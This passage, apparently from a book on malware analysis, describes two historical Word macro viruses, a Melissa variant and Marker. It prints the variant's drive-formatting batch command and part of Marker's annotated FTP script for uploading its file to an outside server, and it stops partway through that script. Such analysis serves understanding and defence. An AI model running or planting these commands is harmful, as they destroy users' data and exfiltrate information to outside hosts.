This Melissa variant attempts to format local hard drives and corrupts CMOS memory, along with using email clients to forward itself. It drops off a batch file, called DRIVES.BAT , that contains the following the commands that will format hard drives:

echo y|format/q d: /v:Empty>NUL

This command is repeated for drives D thru Z.

It also edits the AUTOEXEC.BAT file to run a dropped malicious file, Y2K.COM . This executable file will attempt to corrupt your CMOS settings (disabling the hard drive, etc.), but usually does not result in permanent damage to your CMOS.

Marker is a Word macro virus that keeps track of who it infects and transmits this information to a well-known hacker site (now closed). It creates two temporary ASCII text files on the local hard drive with names like NETLDX.VXD and HSFEDRT.SYS . The .SYS file contains the virus code and the .VXD file is a script file that is used with FTP.EXE to send information back to the hackers. The .VXD file contains the commands in Example 5-4 to which I have added comments:

o 209.201.88.110 ;opens an ftp connection to hacker's ftp site user anonymous ;logs user in as anonymous pass itsme@ ;puts in password cd incoming ;changes to subdirectory called incoming on hacker's site ascii ;puts file transfer in ascii text transmission mode put hsfedrt.sys ...